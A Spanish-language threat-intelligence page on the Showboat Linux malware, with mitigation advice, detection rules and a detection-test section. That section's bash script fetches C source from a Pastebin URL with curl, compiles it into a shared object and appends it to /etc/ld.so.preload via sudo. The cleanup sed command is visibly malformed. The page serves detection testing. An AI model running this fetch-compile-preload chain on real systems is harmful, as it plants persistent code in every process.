El Malware Showboat Apunta a Empresas de Telecomunicaciones en Medio Oriente Desde 2022
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Showboat es un marco modular de post-explotación para Linux construido para entornos AMD x86-64. Activo desde mediados de 2022, está diseñado para mantener acceso a largo plazo y discreto dentro de redes comprometidas. El malware utiliza métodos avanzados de evasión, incluyendo encriptación XOR y el abuso del enlazador dinámico para ocultar procesos maliciosos.
Investigación
La investigación rastreó la infraestructura de comando y control hasta Chengdu, China, lo que, junto con las tácticas, técnicas y procedimientos observados, sugiere vínculos con actores de amenaza alineados con la RPC. El análisis técnico mostró que el malware depende de una llave XOR codificada para descifrar su configuración y abusa de ld.so.preload para lograr el sigilo en los sistemas infectados.
Mitigación
Los defensores deben vigilar los cambios no autorizados en /etc/ld.so.preload y el uso sospechoso del gcc compilador en hosts Linux de producción. También se recomienda desplegar monitoreo de red capaz de identificar comportamientos de baliza, incluso cuando la sincronización es aleatoria, y usar monitoreo de integridad para bibliotecas críticas del sistema.
Respuesta
Si se detecta actividad de Showboat, aísle inmediatamente los sistemas Linux afectados de la red para detener el tráfico de comando y control adicional. Realice análisis forense de memoria para identificar objetos compartidos inyectados y lleve a cabo una auditoría completa de las configuraciones del sistema y tareas programadas para confirmar que todos los mecanismos de persistencia han sido eliminados.
Flujo de Ataque
Detecciones
Intento de Comunicaciones Sosppechosas de Dominio Pastebin (vía proxy)
Ver
Carga/Descarga Remota de Archivos vía Herramientas Estándar (vía línea de comandos)
Ver
Detección de Actividad de Baliza de Malware Showboat [Creación de Procesos en Linux]
Ver
Detectar Actividad de Malware Showboat – Modificación de ld.so.preload y Obtención de Archivo Fuente [Creación de Procesos en Linux]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa deben reflejar directamente los TTPs identificados y buscar generar la telemetría exacta que espera la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un mal diagnóstico.
-
Narrativa y Comandos de Ataque: El atacante busca establecer una intervención persistente de llamadas del sistema. Comienzan descargando un archivo fuente C malicioso desde una URL cruda de Pastebin utilizando
curl. Una vez descargado, utilizangcccon las banderas-sharedand-fPICpara compilar la fuente en un archivo de objeto compartido llamadomalicious.so. Finalmente, intentan lograr persistencia agregando la ruta de esta biblioteca a/etc/ld.so.preload. Esta secuencia está diseñada para inyectar la biblioteca maliciosa en cada proceso del sistema. -
Script de Prueba de Regresión:
#!/bin/bash # Simulación de TTPs de Malware Showboat # 1. Simular obtención de fuente C desde Pastebin # Nota: Usando un enlace real de pastebin (simulado para lógica) o simulando la cadena echo "Creando simulación de descarga de pastebin falso..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # Este comando activa la parte 'selection_fetch' de la regla curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. Simular compilación de un objeto compartido # Este comando activa la parte 'selection_compile' de la regla # (selection_fetch Y selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. Simular modificación de ld.so.preload # Este comando activa la parte 'selection_preload' de la regla echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "Simulación completa. Verifique SIEM para alertas." -
Comandos de Limpieza:
#!/bin/bash # Limpiar artefactos de simulación # Eliminar la biblioteca y fuente maliciosas sudo rm -f /tmp/malicious.so rm -f fake_malware.c # Eliminar la entrada de ld.so.preload (Requiere precaución) # Este comando sed elimina la línea que contiene /tmp/malicious.so sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "Limpieza completa."